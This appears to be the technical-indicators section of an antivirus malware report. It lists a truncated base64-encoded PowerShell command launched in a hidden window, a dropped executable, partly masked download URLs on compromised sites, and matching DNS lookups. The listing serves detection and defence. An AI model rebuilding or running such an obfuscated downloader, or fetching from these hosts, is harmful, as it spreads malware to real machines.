Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABjAGUAaQBjAHYAYQBvAGgAdwBvAGkAdABrAG8AZQBqAD0AJwB2AGEAaQBoAHcAaQBhAG4AdABpAGEAcAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGUAYwBgAFUAUgBJAGAAVAB5AF...
- %HOMEPATH%\936.exe
- %HOMEPATH%\936.exe
- %HOMEPATH%\936.exe
- http://ch##g.be/carole/kkVWtXa/
- http://www.da####abarte.com/Backup/hToa8uw9648/
- http://de###er.info/blogs/EVTd35fbbn7136/
- http://fl##ox.de/cgi-bin/2O64974xq0518072/
- http://gr###sperger.de/bilder/LMZdirUag/
- DNS ASK ch##g.be
- DNS ASK da####abarte.com
- DNS ASK da####abarte.kw.com
- DNS ASK de###er.info
- DNS ASK fl##ox.de
- DNS ASK gr###sperger.de
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABjAGUAaQBjAHYAYQBvAGgAdwBvAGkAdABrAG8AZQBqAD0AJwB2AGEAaQBoAHcAaQBhAG4AdABpAGEAcAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGUAYwBgAFUAUgBJAGAAVAB5AF...' (with hidden window)